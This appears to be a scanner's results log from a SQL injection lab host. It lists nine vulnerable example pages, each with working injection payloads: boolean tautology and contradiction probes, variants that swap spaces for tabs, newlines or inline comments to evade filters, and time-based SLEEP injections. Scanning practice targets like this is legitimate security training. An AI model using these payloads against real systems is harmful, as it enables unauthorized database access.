Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'77418'='77418
'	and	'92454'='92454
'	or	93801=93801#
'	and	'58519'='58520
Advice: 
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'77418'='77418
'	and	'92454'='92454
'	or	93801=93801#
'	and	'58519'='58520
Advice: 
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	32642=32642
	and	44401=44401
	or	53656=53656#
	and	18595=18596
Advice: 
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	32642=32642
	and	44401=44401
	or	53656=53656#
	and	18595=18596
Advice: 
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '/**/and/**/'39907'='39907
'/**/and/**/'5820'='5820
'/**/or/**/4182=4182#
'/**/and/**/'2103'='2104
Advice: 
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	32642=32642
	and	44401=44401
	or	53656=53656#
	and	18595=18596
Advice: 
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 
and
11184=11184

and
5118=5118

or
36310=36310#

and
91561=91562
Advice: 
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: 
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: 
---